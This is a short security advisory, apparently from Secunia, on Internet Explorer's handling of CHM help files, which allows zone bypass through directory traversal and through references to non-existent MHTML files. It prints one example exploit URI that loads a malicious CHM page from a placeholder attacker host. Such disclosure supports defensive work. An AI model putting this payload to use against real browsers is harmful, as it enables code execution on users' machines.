Variants of the older showHelp() zone bypass vulnerability have been discovered, which potentially can be exploited to compromise a user's system.

Remote and locally installed "CHM" help files can be opened by websites via either the "showHelp()" function or certain URI handlers like "ms-its:" and "mk:@MSITStore:". Remote files can execute code in context of the "Internet" security zone whereas local files may execute code with the privileges of the logged in user.

Normally, it isn't a problem that Internet Explorer allows websites to open locally installed "CHM" files as they are considered trusted.

However, there exists two problems within the handling of "CHM" files:

1) It is possible to treat other local files as "CHM" files by using a special syntax with a double ":" appended to the file name combined with a directory traversal using the "..//" character sequence.

This has been exploited via programs such as WinAmp, Flash Player, XMLHTTP, ADODB stream and others, which allow files with arbitrary content to be placed in known locations.

2) Files, which haven't been installed locally, may still execute arbitrary code in context of the "Local Zone" by referencing a non-existent file.

Example:
ms-its:mhtml:file://C:\does_not_exist.mhtml!http://[malicious_site]//malicious.chm::/evil.html"

The vulnerability can be exploited in Internet Explorer including the latest versions with all patches and service packs installed.

Solution
See the following Secunia Advisory:
Further details available in Customer Area

Provided and/or discovered by
Originally reported by Arman Nayyeri.

Changelog
Further details available in Customer Area

Other references
Further details available in Customer Area

Deep Links
Links available in Customer Area